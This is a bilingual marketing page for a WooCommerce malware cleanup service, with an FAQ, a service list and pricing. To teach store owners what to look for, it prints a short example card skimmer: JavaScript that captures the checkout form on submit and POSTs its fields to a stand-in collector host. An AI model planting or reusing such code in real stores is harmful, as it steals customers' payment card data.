¿Cómo sé si mi tienda WooCommerce tiene un skimmer?

Common signals: customers report fraud after buying from you, your acquirer or bank flags suspicious chargebacks, browser dev-tools show an external JavaScript loaded on the checkout that you don't recognise, or a third-party scanner reports 'Magecart-style' injection. If any of these is true, treat the store as compromised until proven otherwise.

¿Gestionáis las implicaciones PCI?

I produce a written incident report that documents what was found, when it was introduced, and what was removed. That report is the form your acquirer or QSA will expect. I am not a QSA and do not perform PCI audits — but my report is the technical record that supports one.

¿Seguirá la tienda online durante la limpieza?

Cuando es seguro, sí. Si encontramos una inyección activa de skimming de tarjetas, la página de checkout debería retirarse o el JavaScript bloquearse en el edge hasta que termine la limpieza — eso protege a los nuevos clientes. Lo recomendaremos en la nota de triaje antes de cualquier cambio destructivo.

¿Es WooCommerce más difícil de limpiar que un WordPress normal?

Mayormente igual — WooCommerce es un plugin encima de WordPress — pero la superficie es mayor: más JavaScript en el checkout, más datos de pedidos en la base de datos y un stack de plugins más pesado. El enfoque de limpieza es idéntico: revisión manual de archivos y base de datos, identificación del vector, hardening.

// WOOCOMMERCE · SKIMMER · BACKDOOR · LIMPIO

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

Iniciar limpieza → Ejemplos de lo que buscamos.

§ 01 — QUÉ SE HACE

Ambos lados del cable.

[ LADO CLIENTE ]
Card skimmers, overlays de formularios de pago, redirecciones condicionales, cryptojackers. JavaScript en el checkout auditado línea por línea.
[ SERVICIOS ]
Web shells, backdoors, payloads de RCE en plugins, usuarios admin inyectados. Eliminados leyendo diffs de archivos y diffs de DB, no por pattern-matching.
[ AUDIT DB ]
wp_options en busca de payloads autoloaded, wp_posts en busca de spam, wp_usermeta en busca de privilegios durmientes, tablas wp_woocommerce_* en busca de manipulación.
[ TRIAGE DE PLUGINS ]
Plugins activos revisados contra CVEs publicadas. Plugins vulnerables parcheados o reemplazados — no sólo desactivados.
[ ENDURECIMIENTO ]
wp-config, permisos, rotación de secretos, XML-RPC, REST API y reducción de la superficie de login.
[ INFORME ]
Informe forense en lenguaje claro: qué se encontró, cuándo se introdujo, qué se eliminó. Entrégalo a un comprador, una aseguradora o tu QSA.

§ 02 — CÓMO LUCE UN SKIMMER

Un script externo en el checkout. Suele ser eso.

Un skimmer de WooCommerce suele ser una única inclusión de JavaScript en la página de checkout que envía los campos del formulario del cliente a un host remoto antes de que WooCommerce envíe el pedido. El script es pequeño, la llamada de red parece un ping de analítica de terceros y el cliente no ve nada raro.

// FORMA APROXIMADA DE UN SKIMMER DE CHECKOUT

01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Los skimmers reales ofuscan el destino y sólo se activan cuando el total del carrito no es cero — pero la estructura es la misma. Audita cada JS del checkout, no sólo los que recuerdas haber instalado.

§ PRECIOS

Tarifa plana $279. Pago único. Por sitio.

[ RESCUE ]

$279

TARIFA FIJA · ÚNICA · POR SITIO

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza →

[ SHIELD ]

$29 / mo

POR SITIO · CANCELA CUANDO QUIERAS

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contacto →